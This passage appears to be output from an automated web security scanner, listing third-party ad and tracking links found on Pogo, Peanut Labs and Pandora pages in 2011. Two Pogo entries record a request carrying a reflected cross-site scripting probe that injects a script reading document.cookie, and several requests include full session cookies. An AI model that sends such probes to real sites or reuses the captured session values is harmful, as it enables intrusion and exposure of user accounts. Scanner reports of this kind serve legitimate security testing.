http://secure-us.imrworldwide.com/cgi-bin/m?ci=us-104040h&cg=0&cc=1&ts=noscript
http://secure.quantserve.com/pixel/p-ccK3FeAja-fUQ.gif
http://secure.quantserve.com/quant.js
http://stat.onestat.com/stat.aspx?tagver=2&sid=246941&js=No&
http://www.onestat.com/
http://www.quantcast.com/p-ccK3FeAja-fUQ

Request

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 01:23:06 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 13109

<html>

<head>

<title>Pandora Radio - Listen to Free Internet Radio, Find New Music</title>


       <link rel="stylesheet" type="text/css" href="/styles/pandora_styles.css" />


<link rel="alter
...[SNIP]...
</a>  |  
                       <a href="http://newton.newtonsoftware.com/career/CareerHome.action?clientId=4028f88b276ac19301276e38e49b048e">jobs</a>
...[SNIP]...
<noscript>
<a href="http://www.onestat.com"><img border="0" width="1" height="1" src="http://stat.onestat.com/stat.aspx?tagver=2&sid=246941&js=No&" ALT="OneStat.com Web Analytics"></a>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-ccK3FeAja-fUQ" target="_blank"><img src="//secure.quantserve.com/pixel/p-ccK3FeAja-fUQ.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...
<noscript>
   <img src="http://b.scorecardresearch.com/b?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<div>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-104040h&cg=0&cc=1&ts=noscript"
width="1" height="1" alt="" />
</div>
...[SNIP]...
<noscript>
<img src='http://s1.srtk.net/www/delivery/ti.php?bannerid=167&trackerid=435&cb=612485' width='1' height='1' border='0'/>
</noscript>
...[SNIP]...

16.47. http://www.peanutlabs.com/js/iFrame/sc.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.peanutlabs.com
Path:	/js/iFrame/sc.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.peanutlabs.com/js/iFrame/sc.php?userId=998826224-3432-8939b981e2

The response contains the following link to another domain:

https://amch.questionmarket.com/dt/s/25387/0.php

Request

GET /js/iFrame/sc.php?userId=998826224-3432-8939b981e2 HTTP/1.1
Host: www.peanutlabs.com
Proxy-Connection: keep-alive
Referer: http://www.peanutlabs.com/userGreeting.php?userId=998826224-3432-8939b981e2&var_val_1=10010&var_key_1=zipcode
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_user_id=8939b981e2-5329197bbf0fb46f475fdce27e545262; pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.1.10.1294536629

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 01:31:45 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 542

<html>

   <head>
       <script type="text/javascript" src="http://static.peanutlabs.com/js/pl-jquery-1.3.2.min.js"></script>
       <script type="text/javascript" src="http://static.peanutlabs.com/js/core.js"><
...[SNIP]...

       <script type="text/javascript" src="https://amch.questionmarket.com/dt/s/25387/0.php"></script>
...[SNIP]...

16.48. http://www.peanutlabs.com/publisher/dashboard2/PublisherDashboard.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.peanutlabs.com
Path:	/publisher/dashboard2/PublisherDashboard.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.peanutlabs.com/publisher/dashboard2/PublisherDashboard.php?register=1

The response contains the following links to other domains:

http://www.adobe.com/go/getflash/
http://www.adobe.com/support/programs/mwm/images/get_flashplayer.gif

Request

GET /publisher/dashboard2/PublisherDashboard.php?register=1 HTTP/1.1
Host: www.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sex=deleted; pl_email=test4%40fastdial.net; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_lang=en_US; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; ext_cid=deleted; dob=deleted; PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; pl_profile=deleted; __utmc=184043431; __utmb=184043431.2.10.1294536629;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 03:07:37 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ext_cid=deleted; expires=Sat, 09-Jan-2010 03:07:36 GMT; path=/; domain=.peanutlabs.com
Vary: Accept-Encoding,User-Agent
Content-Length: 2293
Connection: close
Content-Type: text/html

<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Peanut Labs Media Publisher Dashboard</title>
<script src="AC_OETags.js" language="javascript"
...[SNIP]...
<BR>'
+ '<a href=http://www.adobe.com/go/getflash/><img src="http://www.adobe.com/support/programs/mwm/images/get_flashplayer.gif" border=0></a>
...[SNIP]...

16.49. http://www.pogo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.pogo.com/?sl=2&f9258%22%3E%3Cscript%3Ealert(document.cookie

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/home.pogo/spotlight;dcopt=ist;g=1;tile=1;sz=980x50;ord=180123?
http://ad.doubleclick.net/ad/home.pogo/spotlight;dcopt=ist;g=1;tile=2;sz=300x250;ord=180123?
http://ad.doubleclick.net/adj/home.pogo/spotlight;dcopt=ist;g=1;tile=1;sz=980x50;ord=180123?
http://ad.doubleclick.net/adj/home.pogo/spotlight;dcopt=ist;g=1;tile=2;sz=300x250;ord=180123?
http://ad.doubleclick.net/jump/home.pogo/spotlight;dcopt=ist;g=1;tile=1;sz=980x50;ord=180123?
http://ad.doubleclick.net/jump/home.pogo/spotlight;dcopt=ist;g=1;tile=2;sz=300x250;ord=180123?
http://ads.addynamix.com/category/1-1-0-20050
http://bstats.adbrite.com/click/bstats.gif?kid=38457674&bapid=95
http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/154.png
http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/23.png
http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/34.png
http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/43.png
http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/50.png
http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/51.png
http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/52.png
http://connect.facebook.net/en_US/all.js
http://cts.metricsdirect.com/Conversion.aspx?cpid=8184
http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=893667862
http://www.clubpogo.com/?site=pogo&pageSection=footer_clubpogo
http://www.ea.com/
http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice
http://www.ea.com/global/legal/privacy_enus.jsp?pageSection=footer_privacy
http://www.ea.com/ipad
http://www.ea.com/iphone
http://www.ea.com/mobile
http://www.ea.com/platform/online-games
http://www.ea.com/platform/pc-games
http://www.ea.com/platform/ps3-games
http://www.ea.com/platform/xbox-360-games
http://www.ea.com/wii
http://www.info.ea.com/?pageSection=footer_corpinfo
http://www.java.com/js/deployJava.js
https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos

Request

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Set-Cookie: com.pogo.supressGiftLayer=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/home
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:55:14 GMT
Server: Apache-Coyote/1.1
Content-Length: 429533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<IE:clientCaps ID='oClientCaps' />

<script src="http://www.java.com/js/deployJava.js"></script>
...[SNIP]...

<img src="http://bstats.adbrite.com/click/bstats.gif?kid=38457674&bapid=95" width="1" height="1" border="0">
<img src="http://ads.addynamix.com/category/1-1-0-20050" width="1" height="1" border="0">

</div>
...[SNIP]...
<div><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/home.pogo/spotlight;dcopt=ist;g=1;tile=1;sz=980x50;ord=180123?"></script><noscript><a href="http://ad.doubleclick.net/jump/home.pogo/spotlight;dcopt=ist;g=1;tile=1;sz=980x50;ord=180123?" target="ad"><img src="http://ad.doubleclick.net/ad/home.pogo/spotlight;dcopt=ist;g=1;tile=1;sz=980x50;ord=180123?" width=980 height=50 border=0 alt="Click Here!"></a>
...[SNIP]...
<a href="http://cash-games.pogo.com/games/ww34-forward?site=pogo&pageSection=free_home_all_games4_img_ww34"><img src="http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/34.png" alt="Bejeweled 2" width="80" height="45" /></a>
...[SNIP]...
<a href="http://cash-games.pogo.com/games/ww50-forward?site=pogo&pageSection=free_home_all_games5_img_ww50"><img src="http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/50.png" alt="Bejeweled Twist" width="80" height="45" /></a>
...[SNIP]...
<a href="http://cash-games.pogo.com/games/ww51-forward?site=pogo&pageSection=free_home_all_games0_img_ww51"><img src="http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/51.png" alt="CLUE Mystery Match" width="80" height="45" /></a>
...[SNIP]...
<a href="http://cash-games.pogo.com/games/ww23-forward?site=pogo&pageSection=free_home_all_games1_img_ww23"><img src="http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/23.png" alt="Cubis" width="80" height="45" /></a>
...[SNIP]...
<a href="http://cash-games.pogo.com/games/ww52-forward?site=pogo&pageSection=free_home_all_games3_img_ww52"><img src="http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/52.png" alt="Deal or No Deal" width="80" height="45" /></a>
...[SNIP]...
<a href="http://cash-games.pogo.com/games/ww154-forward?site=pogo&pageSection=free_home_all_games4_img_ww154"><img src="http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/154.png" alt="Dynomite" width="80" height="45" /></a>
...[SNIP]...
<a href="http://cash-games.pogo.com/games/ww43-forward?site=pogo&pageSection=free_home_all_games1_img_ww43"><img src="http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/43.png" alt="Mystery P.I." width="80" height="45" /></a>
...[SNIP]...
</div>

       <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/home.pogo/spotlight;dcopt=ist;g=1;tile=2;sz=300x250;ord=180123?"></script><noscript><a href="http://ad.doubleclick.net/jump/home.pogo/spotlight;dcopt=ist;g=1;tile=2;sz=300x250;ord=180123?" target="ad"><img src="http://ad.doubleclick.net/ad/home.pogo/spotlight;dcopt=ist;g=1;tile=2;sz=300x250;ord=180123?" width=300 height=250 border=0 alt="Click Here!"></a>
...[SNIP]...
</script>
               <script src="http://connect.facebook.net/en_US/all.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<li><a href="http://www.clubpogo.com/?site=pogo&pageSection=footer_clubpogo">Club Pogo</a>
...[SNIP]...
<li><a href="http://www.info.ea.com/?pageSection=footer_corpinfo" rel="nofollow">Corporate Info</a>
...[SNIP]...
<li><a class="popup||1021|600|yes|true" href="http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice" rel="nofollow">Legal Notices</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://www.ea.com/global/legal/privacy_enus.jsp?pageSection=footer_privacy" rel="nofollow">Privacy Policy</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
<li><a href="http://www.ea.com/platform/pc-games" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_pcgames')">PC Games</a>
...[SNIP]...
<li><a href="http://www.ea.com/wii" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_wii')">Wii</a></li>

       <li><a href="http://www.ea.com/platform/online-games" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_onlinegames')">Web</a></li>

       <li><a href="http://www.ea.com/platform/xbox-360-games" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_xboxgames')">Xbox 360</a>
...[SNIP]...
<li><a href="http://www.ea.com/platform/ps3-games" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_psgames')">PS3</a></li>

       <li><a href="http://www.ea.com/iphone" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_iphone')">iPhone</a>
...[SNIP]...
<li><a href="http://www.ea.com/ipad" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_ipad')">iPad</a></li>

       <li><a href="http://www.ea.com/mobile" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_mobile')">Mobile</a>
...[SNIP]...
<div id="copyright-text">
           <a href="http://www.ea.com/" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('footer_ea')"><img src="/img/footer/common/ea-logo.png" alt="" width="31" height="31"/>
...[SNIP]...
</div>


           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=893667862"></iframe>
...[SNIP]...
</div>
<script src="http://cts.MetricsDirect.com/Conversion.aspx?cpid=8184"></script>
...[SNIP]...

16.50. http://www.pogo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.pogo.com/?sl=2&f9258%22%3E%3Cscript%3Ealert(document.cookie

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/home.pogo/spotlight;dcopt=ist;g=1;tile=1;sz=980x50;ord=511929?
http://ad.doubleclick.net/ad/home.pogo/spotlight;dcopt=ist;g=1;tile=2;sz=300x250;ord=511929?
http://ad.doubleclick.net/adj/home.pogo/spotlight;dcopt=ist;g=1;tile=1;sz=980x50;ord=511929?
http://ad.doubleclick.net/adj/home.pogo/spotlight;dcopt=ist;g=1;tile=2;sz=300x250;ord=511929?
http://ad.doubleclick.net/jump/home.pogo/spotlight;dcopt=ist;g=1;tile=1;sz=980x50;ord=511929?
http://ad.doubleclick.net/jump/home.pogo/spotlight;dcopt=ist;g=1;tile=2;sz=300x250;ord=511929?
http://ads.addynamix.com/category/1-1-0-20050
http://bstats.adbrite.com/click/bstats.gif?kid=38457674&bapid=95
http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/154.png
http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/23.png
http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/34.png
http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/43.png
http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/50.png
http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/51.png
http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/52.png
http://connect.facebook.net/en_US/all.js
http://cts.metricsdirect.com/Conversion.aspx?cpid=8184
http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=974089668
http://www.clubpogo.com/?site=pogo&pageSection=footer_clubpogo
http://www.ea.com/
http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice
http://www.ea.com/global/legal/privacy_enus.jsp?pageSection=footer_privacy
http://www.ea.com/ipad
http://www.ea.com/iphone
http://www.ea.com/mobile
http://www.ea.com/platform/online-games
http://www.ea.com/platform/pc-games
http://www.ea.com/platform/ps3-games
http://www.ea.com/platform/xbox-360-games
http://www.ea.com/wii
http://www.info.ea.com/?pageSection=footer_corpinfo
http://www.java.com/js/deployJava.js
https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos

Request

GET /?sl=2&f9258%22%3E%3Cscript%3Ealert(document.cookie HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Set-Cookie: com.pogo.supressGiftLayer=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/home
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 03:02:52 GMT
Server: Apache-Coyote/1.1
Content-Length: 429900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<IE:clientCaps ID='oClientCaps' />

<script src="http://www.java.com/js/deployJava.js"></script>
...[SNIP]...

<img src="http://bstats.adbrite.com/click/bstats.gif?kid=38457674&bapid=95" width="1" height="1" border="0">
<img src="http://ads.addynamix.com/category/1-1-0-20050" width="1" height="1" border="0">

</div>
...[SNIP]...
<div><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/home.pogo/spotlight;dcopt=ist;g=1;tile=1;sz=980x50;ord=511929?"></script><noscript><a href="http://ad.doubleclick.net/jump/home.pogo/spotlight;dcopt=ist;g=1;tile=1;sz=980x50;ord=511929?" target="ad"><img src="http://ad.doubleclick.net/ad/home.pogo/spotlight;dcopt=ist;g=1;tile=1;sz=980x50;ord=511929?" width=980 height=50 border=0 alt="Click Here!"></a>
...[SNIP]...
<a href="http://cash-games.pogo.com/games/ww34-forward?site=pogo&pageSection=free_home_all_games4_img_ww34"><img src="http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/34.png" alt="Bejeweled 2" width="80" height="45" /></a>
...[SNIP]...
<a href="http://cash-games.pogo.com/games/ww50-forward?site=pogo&pageSection=free_home_all_games5_img_ww50"><img src="http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/50.png" alt="Bejeweled Twist" width="80" height="45" /></a>
...[SNIP]...
<a href="http://cash-games.pogo.com/games/ww51-forward?site=pogo&pageSection=free_home_all_games0_img_ww51"><img src="http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/51.png" alt="CLUE Mystery Match" width="80" height="45" /></a>
...[SNIP]...
<a href="http://cash-games.pogo.com/games/ww23-forward?site=pogo&pageSection=free_home_all_games1_img_ww23"><img src="http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/23.png" alt="Cubis" width="80" height="45" /></a>
...[SNIP]...
<a href="http://cash-games.pogo.com/games/ww52-forward?site=pogo&pageSection=free_home_all_games3_img_ww52"><img src="http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/52.png" alt="Deal or No Deal" width="80" height="45" /></a>
...[SNIP]...
<a href="http://cash-games.pogo.com/games/ww154-forward?site=pogo&pageSection=free_home_all_games4_img_ww154"><img src="http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/154.png" alt="Dynomite" width="80" height="45" /></a>
...[SNIP]...
<a href="http://cash-games.pogo.com/games/ww43-forward?site=pogo&pageSection=free_home_all_games1_img_ww43"><img src="http://cdn.worldwinner.com/0010C5/ww/dynamic/images/skin/worldwinner/games/80x45/43.png" alt="Mystery P.I." width="80" height="45" /></a>
...[SNIP]...
</div>

       <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/home.pogo/spotlight;dcopt=ist;g=1;tile=2;sz=300x250;ord=511929?"></script><noscript><a href="http://ad.doubleclick.net/jump/home.pogo/spotlight;dcopt=ist;g=1;tile=2;sz=300x250;ord=511929?" target="ad"><img src="http://ad.doubleclick.net/ad/home.pogo/spotlight;dcopt=ist;g=1;tile=2;sz=300x250;ord=511929?" width=300 height=250 border=0 alt="Click Here!"></a>
...[SNIP]...
</script>
               <script src="http://connect.facebook.net/en_US/all.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<li><a href="http://www.clubpogo.com/?site=pogo&pageSection=footer_clubpogo">Club Pogo</a>
...[SNIP]...
<li><a href="http://www.info.ea.com/?pageSection=footer_corpinfo" rel="nofollow">Corporate Info</a>
...[SNIP]...
<li><a class="popup||1021|600|yes|true" href="http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice" rel="nofollow">Legal Notices</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="http://www.ea.com/global/legal/privacy_enus.jsp?pageSection=footer_privacy" rel="nofollow">Privacy Policy</a>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
<li><a href="http://www.ea.com/platform/pc-games" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_pcgames')">PC Games</a>
...[SNIP]...
<li><a href="http://www.ea.com/wii" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_wii')">Wii</a></li>

       <li><a href="http://www.ea.com/platform/online-games" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_onlinegames')">Web</a></li>

       <li><a href="http://www.ea.com/platform/xbox-360-games" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_xboxgames')">Xbox 360</a>
...[SNIP]...
<li><a href="http://www.ea.com/platform/ps3-games" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_psgames')">PS3</a></li>

       <li><a href="http://www.ea.com/iphone" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_iphone')">iPhone</a>
...[SNIP]...
<li><a href="http://www.ea.com/ipad" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_ipad')">iPad</a></li>

       <li><a href="http://www.ea.com/mobile" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('au_fteapt_mobile')">Mobile</a>
...[SNIP]...
<div id="copyright-text">
           <a href="http://www.ea.com/" onclick="if(typeof OmnitureCustomLink=='function')OmnitureCustomLink('footer_ea')"><img src="/img/footer/common/ea-logo.png" alt="" width="31" height="31"/>
...[SNIP]...
</div>


           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=974089668"></iframe>
...[SNIP]...
</div>
<script src="http://cts.MetricsDirect.com/Conversion.aspx?cpid=8184"></script>
...[SNIP]...

16.51. http://www.pogo.com/all-games previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/all-games

Issue detail

The page was loaded from a URL containing a query string:

http://www.pogo.com/all-games?pageSection=footer_allgames

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/allgames.pogo/category;dcopt=ist;g=1;tile=1;sz=300x250;ord=583577?
http://ad.doubleclick.net/adj/allgames.pogo/category;dcopt=ist;g=1;tile=1;sz=300x250;ord=583577?
http://ad.doubleclick.net/jump/allgames.pogo/category;dcopt=ist;g=1;tile=1;sz=300x250;ord=583577?
http://connect.facebook.net/en_US/all.js
http://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=654693457
http://www.clubpogo.com/?site=pogo&pageSection=footer_clubpogo
http://www.ea.com/
http://www.ea.com/global/legal/legalnotice.jsp?pageSection=footer_legalnotice
http://www.ea.com/global/legal/privacy_enus.jsp?pageSection=footer_privacy
http://www.ea.com/ipad
http://www.ea.com/iphone
http://www.ea.com/mobile
http://www.ea.com/platform/online-games
http://www.ea.com/platform/pc-games
http://www.ea.com/platform/ps3-games
http://www.ea.com/platform/xbox-360-games
http://www.ea.com/wii
http://www.googleadservices.com/pagead/conversion.js
http://www.googleadservices.com/pagead/conversion/1068507910/?label=default&guid=ON&script=0
http://www.info.ea.com/?pageSection=footer_corpinfo
http://www.java.com/js/deployJava.js
https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos

Request

GET /all-games?pageSection=footer_allgames HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:57:57 GMT
Server: Apache-Coyote/1.1
Content-Length: 107598

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
</script>

   <script src="http://connect.facebook.net/en_US/all.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<IE:clientCaps ID='oClientCaps' />

<script src="http://www.java.com/js/deployJava.js"></script>
...[SNIP]...
</div>
